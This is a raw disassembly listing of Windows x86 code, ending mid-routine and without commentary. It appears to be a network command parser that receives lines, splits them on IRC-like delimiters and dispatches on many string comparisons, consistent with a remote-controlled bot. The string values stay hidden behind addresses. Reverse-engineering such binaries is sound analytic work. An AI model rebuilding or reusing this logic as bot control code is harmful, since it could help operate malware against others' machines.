; ---------------------------------------------------------------------------
loc_40919B: ; CODE XREF: sub_4090B0+CD�j
lea eax, [ebp+var_18C]
push eax
push offset dword_42A134
call sub_407E82
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_409218
add esp, 28h
mov edi, eax
push esi
call ds:dword_430828
test edi, edi
jz loc_4090D5
cmp edi, 1
jnz short loc_4091F8
push 0DBBA0h
jmp short loc_409190
; ---------------------------------------------------------------------------
loc_4091F8: ; CODE XREF: sub_4090B0+13F�j
cmp edi, 2
jz short loc_409206
jmp loc_4090D5
; ---------------------------------------------------------------------------
loc_409202: ; CODE XREF: sub_4090B0+5A�j
xor eax, eax
jmp short loc_409212
; ---------------------------------------------------------------------------
loc_409206: ; CODE XREF: sub_4090B0+14B�j
push [ebp+var_34]
call sub_4102D3
pop ecx
push 2
pop eax
loc_409212: ; CODE XREF: sub_4090B0+154�j
pop edi
pop esi
leave
retn 4
sub_4090B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409218 proc near ; CODE XREF: sub_4090B0+123�p
var_1A10 = byte ptr -1A10h
var_A10 = byte ptr -0A10h
var_240 = byte ptr -240h
var_1A0 = byte ptr -1A0h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A10h
call sub_410BE0
push ebx
push esi
push edi
xor ebx, ebx
push 2
mov [ebp+var_8], ebx
lea eax, [ebp+var_1A0]
pop ecx
loc_409236: ; CODE XREF: sub_409218+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_409236
cmp ds:byte_45ED40, bl
jz short loc_40925D
push offset byte_45ED40
push offset dword_42A180
push [ebp+arg_0]
call sub_40E321
add esp, 0Ch
loc_40925D: ; CODE XREF: sub_409218+2E�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push ebx
push ebx
push 2
push eax
call sub_40FA4E
add esp, 10h
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_C]
push offset dword_42A164
push eax
call sub_41050B
add esp, 14h
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call ds:dword_4307E0
cmp eax, 0FFFFFFFFh
jnz short loc_4092C7
push [ebp+arg_0]
call ds:dword_430828
push 1388h
call ds:dword_41C058 ; Sleep
loc_4092C0: ; CODE XREF: sub_409218+D9�j
; sub_409218+153�j
xor eax, eax
loc_4092C2: ; CODE XREF: sub_409218+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4092C7: ; CODE XREF: sub_409218+92�j
; sub_409218+F8�j ...
mov esi, 1000h
lea eax, [ebp+var_1A10]
push esi
push ebx
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp+var_1A10]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_4307AC
test eax, eax
jle short loc_4092C0
lea eax, [ebp+var_A10]
push eax
lea eax, [ebp+var_1A10]
push eax
call sub_406CFF
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_4092C7
lea edi, [ebp+var_A10]
loc_409318: ; CODE XREF: sub_409218+165�j
push 1
pop esi
loc_40931B: ; CODE XREF: sub_409218+144�j
push [ebp+arg_1C]
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_1A0]
push eax
push [ebp+arg_18]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [edi]
call loc_409390
add esp, 2Ch
dec eax
mov esi, eax
cmp esi, ebx
jle short loc_40935E
push 7D0h
call ds:dword_41C058 ; Sleep
jmp short loc_40931B
; ---------------------------------------------------------------------------
loc_40935E: ; CODE XREF: sub_409218+137�j
cmp esi, 0FFFFFFFDh
jz short loc_409388
cmp esi, 0FFFFFFFEh
jz short loc_409384
cmp esi, 0FFFFFFFFh
jz loc_4092C0
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_409318
jmp loc_4092C7
; ---------------------------------------------------------------------------
loc_409384: ; CODE XREF: sub_409218+14E�j
push 1
jmp short loc_40938A
; ---------------------------------------------------------------------------
loc_409388: ; CODE XREF: sub_409218+149�j
push 2
loc_40938A: ; CODE XREF: sub_409218+16E�j
pop eax
jmp loc_4092C2
sub_409218 endp
; ---------------------------------------------------------------------------
loc_409390: ; CODE XREF: sub_409218+12A�p
push ebp
mov ebp, esp
mov eax, 159Ch
call sub_410BE0
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp-2E4h]
push ebx
push eax
mov dword ptr [ebp-0ACh], 3
mov [ebp-10h], ebx
mov [ebp-0A8h], ebx
mov [ebp-8], ebx
mov [ebp-4], ebx
mov [ebp-0C8h], ebx
call sub_410590
push 1Bh
lea eax, [ebp-464h]
push dword ptr [ebp+18h]
push eax
call sub_411D00
add esp, 18h
cmp [ebp+8], ebx
jz loc_40980B
push esi
lea eax, [ebp-0F9Ch]
push ebx
push eax
call sub_410590
dec esi
lea eax, [ebp-0F9Ch]
push esi
push dword ptr [ebp+8]
push eax
call sub_411D00
lea eax, [ebp-0F9Ch]
push offset dword_42CBAC
push eax
call sub_410AE0
mov [ebp-0Ch], eax
lea eax, [ebp-0F9Ch]
push esi
push eax
lea eax, [ebp-119Ch]
push eax
call sub_411D00
mov esi, offset dword_41F6B0
lea eax, [ebp-119Ch]
push esi
push eax
call sub_411C60
add esp, 34h
mov [ebp-0A0h], eax
lea edi, [ebp-9Ch]
mov dword ptr [ebp-0A4h], 1Fh
loc_409463: ; CODE XREF: seg000:00409477�j
push esi
push ebx
call sub_411C60
mov [edi], eax
pop ecx
add edi, 4
dec dword ptr [ebp-0A4h]
pop ecx
jnz short loc_409463
mov esi, [ebp-0A0h]
cmp esi, ebx
jz loc_40980B
cmp [ebp-9Ch], ebx
jz loc_40980B
push 100h
lea eax, [ebp-0A14h]
push ebx
push eax
call sub_410590
add esp, 0Ch
lea ecx, [ebp-24h]
push 1Fh
pop edx
push 1
pop edi
loc_4094B1: ; CODE XREF: seg000:004094E3�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_4094DD
cmp byte ptr [eax], 2Dh
jnz short loc_4094E5
cmp [eax+2], bl
jnz short loc_4094E5
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov byte ptr [ebp+esi-0A14h], 1
mov esi, [ebp-0A0h]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_4094DD: ; CODE XREF: seg000:004094B5�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_4094B1
loc_4094E5: ; CODE XREF: seg000:004094BA�j
; seg000:004094BF�j
cmp [ebp-9A1h], bl
jz short loc_4094F0
mov [ebp-8], edi
loc_4094F0: ; CODE XREF: seg000:004094EB�j
cmp [ebp-9A6h], bl
jz short loc_4094FE
mov [ebp-8], ebx
mov [ebp-4], edi
loc_4094FE: ; CODE XREF: seg000:004094F6�j
cmp byte ptr [esi], 0Ah
jz short loc_409538
push 7Fh
lea eax, [ebp-0A94h]
push esi
push eax
call sub_411D00
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp-0C4h]
push eax
call sub_411D00
lea eax, [ebp-0C4h]
push offset dword_42625C
push eax
call sub_411C60
add esp, 20h
loc_409538: ; CODE XREF: seg000:00409501�j
push esi
push offset dword_42CBA4
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_409589
push dword ptr [ebp-9Ch]
mov byte ptr [esi+1], 4Fh
push offset dword_42CB98
push dword ptr [ebp+0Ch]
call sub_40E321
mov eax, [ebp+28h]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40962D
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push offset dword_42CB88
push dword ptr [ebp+0Ch]
call sub_40E321
add esp, 10h
jmp loc_40962D
; ---------------------------------------------------------------------------
loc_409589: ; CODE XREF: seg000:00409547�j
mov esi, [ebp-9Ch]
push esi
push offset dword_426140
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E2DB
push esi
push offset dword_426130
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E2DB
push esi
push offset dword_42CB84
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4095F4
push offset dword_426224
push dword ptr [ebp-94h]
call sub_410AE0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40962D
inc eax
push 9Fh
push eax
push dword ptr [ebp+24h]
call sub_411D00
add esp, 0Ch
jmp short loc_40962D
; ---------------------------------------------------------------------------
loc_4095F4: ; CODE XREF: seg000:004095C8�j
push esi
push offset dword_42CB80
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_409634
push ebx
push ds:dword_45ED3C
push ds:dword_423014
push dword ptr [ebp+18h]
call sub_40FA4E
push dword ptr [ebp+18h]
push offset dword_42CB74
push dword ptr [ebp+0Ch]
call sub_40E321
add esp, 1Ch
loc_40962D: ; CODE XREF: seg000:00409568�j
; seg000:00409584�j ...
mov eax, edi
jmp loc_40980E
; ---------------------------------------------------------------------------
loc_409634: ; CODE XREF: seg000:00409603�j
mov esi, [ebp+20h]
mov dword ptr [ebp-0A4h], 2
mov edi, 80h
loc_409646: ; CODE XREF: seg000:0040966B�j
lea eax, [ebp-0A94h]
push eax
push esi
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_409663
mov dword ptr [ebp-0A8h], 1
loc_409663: ; CODE XREF: seg000:00409657�j
add esi, edi
dec dword ptr [ebp-0A4h]
jnz short loc_409646
mov esi, [ebp-9Ch]
push esi
push offset dword_42CB6C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40975A
mov esi, [ebp+20h]
mov dword ptr [ebp+2Ch], 2
loc_409692: ; CODE XREF: seg000:0040971F�j
cmp [esi], bl
jz loc_40971A
push 7Fh
lea eax, [ebp-0A94h]
push esi
push eax
call sub_411D00
lea eax, [ebp-0C4h]
add esp, 0Ch
test eax, eax
jz short loc_40971A
cmp [ebp-94h], ebx
jz short loc_40971A
push dword ptr [ebp-94h]
lea eax, [ebp-0C4h]
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40971A
lea eax, [ebp-0C4h]
mov [esi], bl
push eax
lea eax, [ebp-2E4h]
push offset dword_42CB38
push eax
call sub_41050B
lea eax, [ebp-2E4h]
push eax
lea eax, [ebp-0C4h]
push eax
push offset dword_42CB28
push dword ptr [ebp+0Ch]
call sub_40E321
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
add esp, 20h
loc_40971A: ; CODE XREF: seg000:00409694�j
; seg000:004096B4�j ...
add esi, edi
dec dword ptr [ebp+2Ch]
jnz loc_409692
push dword ptr [ebp-94h]
push dword ptr [ebp+18h]
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40980B
push dword ptr [ebp+14h]
mov eax, [ebp+28h]
push dword ptr [ebp+10h]
mov [eax], ebx
push offset dword_42CB88
loc_40974D: ; CODE XREF: seg000:0040998C�j
; seg000:00409C58�j
push dword ptr [ebp+0Ch]
call sub_40E321
jmp loc_40DCD4
; ---------------------------------------------------------------------------
loc_40975A: ; CODE XREF: seg000:00409682�j
push esi
push offset dword_42CB20
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_4098A0
mov eax, [ebp-98h]
mov esi, [ebp+20h]
inc eax
mov dword ptr [ebp+8], 2
mov [ebp+2Ch], eax
loc_409783: ; CODE XREF: seg000:004097D5�j
lea eax, [ebp-0A94h]
push eax
push esi
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4097D0
lea eax, [ebp-0A94h]
push 21h
push eax
call sub_412760
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+24h], eax
jz short loc_4097D0
push dword ptr [ebp+2Ch]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_411B70
push dword ptr [ebp+24h]
push edi
call sub_411B80
add esp, 10h
mov edi, 80h
loc_4097D0: ; CODE XREF: seg000:00409794�j
; seg000:004097AB�j
add esi, edi
dec dword ptr [ebp+8]
jnz short loc_409783
lea eax, [ebp-0C4h]
test eax, eax
jz short loc_40980B
cmp [ebp+2Ch], ebx
jz short loc_40980B
push dword ptr [ebp+18h]
lea eax, [ebp-0C4h]
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_409813
push 0Fh
push dword ptr [ebp+2Ch]
push dword ptr [ebp+18h]
call sub_411D00
add esp, 0Ch
loc_40980B: ; CODE XREF: seg000:004093EB�j
; seg000:00409481�j ...
push 1
loc_40980D: ; CODE XREF: seg000:0040DF9E�j
pop eax
loc_40980E: ; CODE XREF: seg000:0040962F�j
; seg000:0040C68F�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409813: ; CODE XREF: seg000:004097F9�j
mov edi, [ebp+20h]
xor esi, esi
loc_409818: ; CODE XREF: seg000:00409839�j
cmp [edi], bl
jz short loc_40982F
lea eax, [ebp-0A94h]
push eax
push edi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40983D
loc_40982F: ; CODE XREF: seg000:0040981A�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_409818
jmp short loc_40980B
; ---------------------------------------------------------------------------
loc_40983D: ; CODE XREF: seg000:0040982D�j
lea eax, [ebp-0A94h]
push 21h
push eax
call sub_412760
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+8], eax
jz short loc_40980B
push eax
call sub_410B60
push dword ptr [ebp+2Ch]
mov edi, eax
call sub_410B60
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_40980B
push dword ptr [ebp+8]
shl esi, 7
push dword ptr [ebp+2Ch]
add esi, [ebp+20h]
push offset dword_42CB18
push esi
call sub_41050B
push ebx
lea eax, [ebp-4C8h]
push ebx
push eax
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 24h
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_4098A0: ; CODE XREF: seg000:00409769�j
push esi
push offset dword_42CB10
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_4098C2
push esi
push offset dword_41F3E0
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_4098E9
loc_4098C2: ; CODE XREF: seg000:004098AF�j
mov edi, [ebp+20h]
xor esi, esi
loc_4098C7: ; CODE XREF: seg000:004098E7�j
cmp [edi], bl
jz short loc_4098DD
push dword ptr [ebp-0A0h]
push edi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_409930
loc_4098DD: ; CODE XREF: seg000:004098C9�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_4098C7
loc_4098E9: ; CODE XREF: seg000:004098C0�j
push dword ptr [ebp-9Ch]
push offset dword_42CB0C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_409991
push dword ptr [ebp-90h]
push dword ptr [ebp+10h]
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_409920
mov eax, [ebp+28h]
mov dword ptr [eax], 1
loc_409920: ; CODE XREF: seg000:00409915�j
push dword ptr [ebp-90h]
push offset dword_42CAD8
jmp loc_40E2CF
; ---------------------------------------------------------------------------
loc_409930: ; CODE XREF: seg000:004098DB�j
mov eax, [ebp+20h]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp-0C4h]
push eax
lea eax, [ebp-2E4h]
push offset dword_42CAA4
push eax
call sub_41050B
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
push dword ptr [ebp-9Ch]
push offset dword_42CB10
call sub_410930
add esp, 18h
test eax, eax
jnz loc_40980B
lea eax, [ebp-2E4h]
push eax
mov eax, [ebp-0A0h]
inc eax
push eax
push offset dword_42CB28
jmp loc_40974D
; ---------------------------------------------------------------------------
loc_409991: ; CODE XREF: seg000:004098FD�j
push dword ptr [ebp-9Ch]
mov esi, offset dword_42CA9C
push esi
call sub_410930
pop ecx
mov edi, offset dword_42CA94
test eax, eax
pop ecx
jz short loc_4099E5
push dword ptr [ebp-9Ch]
push edi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_4099E5
push dword ptr [ebp-9Ch]
push offset dword_42CA90
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40E148
cmp ds:dword_423004, ebx
jz loc_40E148
loc_4099E5: ; CODE XREF: seg000:004099AB�j
; seg000:004099BD�j
push dword ptr [ebp-9Ch]
push esi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_409AEB
push dword ptr [ebp-9Ch]
push edi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_409AEB
mov eax, [ebp-94h]
inc dword ptr [ebp-90h]
push 4
mov [ebp-98h], eax
pop esi
mov [ebp-0ACh], esi
loc_409A2C: ; CODE XREF: seg000:00409BA7�j
; seg000:00409C2D�j ...
shl esi, 2
mov ecx, [ebp+esi-0A0h]
lea eax, [ebp+esi-0A0h]
lea edi, [ecx+1]
mov [eax], edi
mov al, [ecx]
cmp al, ds:byte_42300C
mov [ebp+14h], edi
jnz loc_40980B
push edi
push offset dword_42CA84
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E150
push edi
push offset dword_42CA80
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E150
cmp [ebp-0A8h], ebx
jnz short loc_409A9F
push dword ptr [ebp-9Ch]
push offset dword_42CA90
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_40E148
loc_409A9F: ; CODE XREF: seg000:00409A83�j
cmp [ebp+30h], ebx
jnz loc_40E148
cmp ds:dword_42561C, ebx
mov [ebp+10h], ebx
jle loc_409DB3
mov dword ptr [ebp+28h], offset dword_434B58
loc_409ABE: ; CODE XREF: seg000:00409AE4�j
push edi
push dword ptr [ebp+28h]
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_409C5D
inc dword ptr [ebp+10h]
add dword ptr [ebp+28h], 0B8h
mov eax, [ebp+10h]
cmp eax, ds:dword_42561C
jl short loc_409ABE
jmp loc_409DB3
; ---------------------------------------------------------------------------
loc_409AEB: ; CODE XREF: seg000:004099F5�j
; seg000:00409A0B�j
push dword ptr [ebp-9Ch]
push edi
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_409B04
mov dword ptr [ebp-4], 1
loc_409B04: ; CODE XREF: seg000:00409AFB�j
cmp [ebp-98h], ebx
jz loc_40980B
push offset dword_41F1BC
push dword ptr [ebp-98h]
call sub_410AE0
pop ecx
test eax, eax
pop ecx
jz short loc_409B2B
cmp [ebp-4], ebx
jz short loc_409B37
loc_409B2B: ; CODE XREF: seg000:00409B24�j
lea eax, [ebp-0C4h]
mov [ebp-98h], eax
loc_409B37: ; CODE XREF: seg000:00409B29�j
cmp [ebp-94h], ebx
jz loc_40980B
inc dword ptr [ebp-94h]
jz short loc_409B83
cmp [ebp+18h], ebx
jz short loc_409B83
lea eax, [ebp-464h]
push eax
call sub_410B60
push eax
lea eax, [ebp-464h]
push dword ptr [ebp-94h]
push eax
call sub_411E90
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp-0ACh], esi
jmp short loc_409B89
; ---------------------------------------------------------------------------
loc_409B83: ; CODE XREF: seg000:00409B49�j
; seg000:00409B4E�j
mov esi, [ebp-0ACh]
loc_409B89: ; CODE XREF: seg000:00409B81�j
mov edi, [ebp+esi*4-0A0h]
cmp edi, ebx
jz loc_40980B
push edi
push offset dword_42CA74
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_409A2C
mov ecx, [ebp-98h]
cmp byte ptr [ecx], 23h
jz short loc_409C1E
mov eax, ds:dword_45ED4C
mov eax, ds:dword_4230DC[eax*4]
cmp [eax], bl
jz short loc_409C1E
push eax
push ecx
push offset dword_42CA58
push dword ptr [ebp+0Ch]
call sub_40E321
lea eax, [ebp-0C4h]
push eax
lea eax, [ebp-2E4h]
push offset dword_42CA3C
push eax
call sub_41050B
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
add esp, 20h
cmp [ebp-0A8h], ebx
jnz loc_40980B
push ebx
lea eax, [ebp-2E4h]
push 1
push eax
push offset dword_45EC54
jmp loc_40DB22
; ---------------------------------------------------------------------------
loc_409C1E: ; CODE XREF: seg000:00409BB6�j
; seg000:00409BC6�j
push edi
push offset dword_42CA34
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz loc_409A2C
mov eax, [ebp+esi*4-9Ch]
cmp eax, ebx
jz loc_409A2C
mov ecx, [ebp-98h]
cmp byte ptr [ecx], 23h
jz loc_409A2C
push eax
push ecx
push offset dword_42CA1C
jmp loc_40974D
; ---------------------------------------------------------------------------
loc_409C5D: ; CODE XREF: seg000:00409ACB�j
push offset dword_42CBAC
push dword ptr [ebp+8]
call sub_410AE0
pop ecx
cmp eax, ebx
pop ecx
jz loc_40980B
mov edi, [ebp+10h]
mov cl, ds:byte_42300C
imul edi, 0B8h
mov [eax+2], cl
mov cl, ds:byte_42300C
mov [eax+3], cl
lea ecx, dword_434B70[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_411D00
lea eax, [ebp+esi-60h]
add esp, 0Ch
mov dword ptr [ebp+10h], 0Fh
mov [ebp+28h], eax
loc_409CB5: ; CODE XREF: seg000:00409D4E�j
push dword ptr [ebp+10h]
lea eax, [ebp-20h]
push offset dword_42CA14
push eax
call sub_41050B
lea eax, [ebp-20h]
push eax
push dword ptr [ebp+8]
call sub_410AE0
add esp, 14h
test eax, eax
jz short loc_409D18
mov eax, [ebp+28h]
cmp [eax], ebx
jz short loc_409D18
lea eax, dword_434B58[edi]
push eax
call sub_410B60
add [ebp-0Ch], eax
pop ecx
jz short loc_409D44
mov eax, [ebp+28h]
push dword ptr [eax-4]
push dword ptr [ebp-0Ch]
call sub_410AE0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_409D44
push eax
lea eax, [ebp-20h]
push eax
push dword ptr [ebp+8]
call sub_406C6E
add esp, 0Ch
jmp short loc_409D44
; ---------------------------------------------------------------------------
loc_409D18: ; CODE XREF: seg000:00409CD7�j
; seg000:00409CDE�j
mov eax, [ebp+28h]
cmp [eax], ebx
jnz short loc_409D44
lea eax, [ebp-20h]
push 2
push eax
lea eax, [ebp-14h]
push eax
call sub_411D00
lea eax, [ebp-14h]
mov [ebp-12h], bl
push eax
lea eax, [ebp-20h]
push eax
push dword ptr [ebp+8]
call sub_406C6E
add esp, 18h
loc_409D44: ; CODE XREF: seg000:00409CF0�j
; seg000:00409D04�j ...
dec dword ptr [ebp+10h]
sub dword ptr [ebp+28h], 4
cmp [ebp+10h], ebx
jg loc_409CB5
lea eax, [ebp+esi-60h]
mov dword ptr [ebp+10h], 10h
mov edi, eax
loc_409D61: ; CODE XREF: seg000:00409DA4�j
push dword ptr [ebp+10h]
lea eax, [ebp-20h]
push offset dword_42CA10
push eax
call sub_41050B
lea eax, [ebp-20h]
push eax
push dword ptr [ebp+8]
call sub_410AE0
add esp, 14h
test eax, eax
jz short loc_409D9B
mov eax, [edi]
cmp eax, ebx
jz short loc_409D9B
push eax
lea eax, [ebp-20h]
push eax
push dword ptr [ebp+8]
call sub_406C6E
add esp, 0Ch
loc_409D9B: ; CODE XREF: seg000:00409D83�j
; seg000:00409D89�j
dec dword ptr [ebp+10h]
sub edi, 4
cmp [ebp+10h], ebx
jg short loc_409D61
mov edi, [ebp+14h]
mov dword ptr [ebp-0C8h], 1
loc_409DB3: ; CODE XREF: seg000:00409AB1�j
; seg000:00409AE6�j
mov al, [edi]
cmp al, ds:byte_42300C
jz short loc_409DC9
cmp [ebp-0C8h], ebx
jz loc_409F8A
loc_409DC9: ; CODE XREF: seg000:00409DBB�j
push dword ptr [ebp+18h]
mov edi, [ebp+8]
push offset dword_42CA0C
push edi
call sub_406C6E
lea eax, [ebp-0C4h]
push eax
push offset dword_42CA04
push edi
call sub_406C6E
push dword ptr [ebp-98h]
push offset dword_42C9FC
push edi
call sub_406C6E
push ebx
push ebx
lea eax, [ebp-20h]
push 2
push eax
call sub_40FA4E
push eax
push offset dword_42C9F0
push edi
call sub_406C6E
add esp, 40h
push dword ptr [ebp+1Ch]
push offset dword_42C9E8
push edi
call sub_406C6E
mov edi, offset dword_42C9E0
push edi
push dword ptr [ebp+8]
call sub_410AE0
add esp, 14h
loc_409E38: ; CODE XREF: seg000:00409F03�j
test eax, eax
jz loc_409F08
push edi
push dword ptr [ebp+8]
call sub_410AE0
mov [ebp+18h], eax
add eax, 5
push 4
push eax
lea eax, [ebp-20h]
push eax
call sub_411D00
lea eax, [ebp-20h]
push offset dword_42C9DC
push eax
call sub_411C60
add esp, 1Ch
cmp byte ptr [ebp-20h], 30h
jl short loc_409E78
cmp byte ptr [ebp-20h], 39h
jle short loc_409E8B
loc_409E78: ; CODE XREF: seg000:00409E70�j
push 3
lea eax, [ebp-20h]
push offset dword_42C9D8
push eax
call sub_411D00
add esp, 0Ch
loc_409E8B: ; CODE XREF: seg000:00409E76�j
lea eax, [ebp-20h]
push eax
call sub_410A7F
test eax, eax
pop ecx
jle short loc_409EA8
lea eax, [ebp-20h]
push eax
call sub_410A7F
pop ecx
mov [ebp-14h], al
jmp short loc_409EB9
; ---------------------------------------------------------------------------
loc_409EA8: ; CODE XREF: seg000:00409E97�j
call sub_410567
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp-14h], dl
loc_409EB9: ; CODE XREF: seg000:00409EA6�j
lea eax, [ebp-20h]
mov [ebp-13h], bl
push eax
call sub_410B60
mov [ebp+10h], eax
push 0Ch
lea eax, [ebp-20h]
push ebx
push eax
call sub_410590
mov eax, [ebp+10h]
add eax, 6
push eax
lea eax, [ebp-20h]
push dword ptr [ebp+18h]
push eax
call sub_411D00
lea eax, [ebp-14h]
push eax
lea eax, [ebp-20h]
push eax
push dword ptr [ebp+8]
call sub_406C6E
push edi
push dword ptr [ebp+8]
call sub_410AE0
add esp, 30h
jmp loc_409E38
; ---------------------------------------------------------------------------
loc_409F08: ; CODE XREF: seg000:00409E3A�j
mov edi, 1FFh
lea eax, [ebp-0F9Ch]
push edi
push dword ptr [ebp+8]
push eax
call sub_411D00
lea eax, [ebp-0F9Ch]
push edi
push eax
lea eax, [ebp-119Ch]
push eax
call sub_411D00
lea eax, [ebp-119Ch]
push offset dword_41F6B0
push eax
call sub_411C60
add esp, 20h
mov [ebp-0A0h], eax
lea edi, [ebp-9Ch]
mov dword ptr [ebp+18h], 1Fh
loc_409F58: ; CODE XREF: seg000:00409F6D�j
push offset dword_41F6B0
push ebx
call sub_411C60
mov [edi], eax
pop ecx
add edi, 4
dec dword ptr [ebp+18h]
pop ecx
jnz short loc_409F58
mov ecx, [ebp+esi-0A0h]
lea eax, [ebp+esi-0A0h]
cmp ecx, ebx
jz loc_40980B
add ecx, 3
mov [eax], ecx
loc_409F8A: ; CODE XREF: seg000:00409DC3�j
mov edi, [ebp+esi-0A0h]
push edi
push offset dword_42C9CC
mov [ebp+18h], edi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E0FB
push edi
push offset dword_42C9C4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E0FB
push edi
push offset dword_42C9B8
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E0D9
push edi
push offset dword_42C9B0
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E0D9
push edi
push offset dword_42C9A4
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E02E
push edi
push offset dword_42C99C
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_40E02E
push edi
push offset dword_42C988
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A03B
push dword ptr [ebp+esi-9Ch]
push 6
push offset dword_42C980
push offset dword_42C970
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A03B: ; CODE XREF: seg000:0040A021�j
push edi
push offset dword_42C960
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A064
push dword ptr [ebp+esi-9Ch]
push 3
push offset dword_42C980
push offset dword_42C954
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A064: ; CODE XREF: seg000:0040A04A�j
push edi
push offset dword_42C94C
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A08D
push dword ptr [ebp+esi-9Ch]
push 1Ch
push offset dword_42C940
push offset dword_42C934
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A08D: ; CODE XREF: seg000:0040A073�j
push edi
push offset dword_42C920
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A0B6
push dword ptr [ebp+esi-9Ch]
push 10h
push offset dword_42C910
push offset dword_42C900
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A0B6: ; CODE XREF: seg000:0040A09C�j
push edi
push offset dword_42C8F4
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A0DF
push dword ptr [ebp+esi-9Ch]
push 0Ah
push offset dword_42C8E8
push offset dword_42C8DC
jmp loc_40E012
; ---------------------------------------------------------------------------
loc_40A0DF: ; CODE XREF: seg000:0040A0C5�j
push edi
push offset dword_42C8CC
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40A108
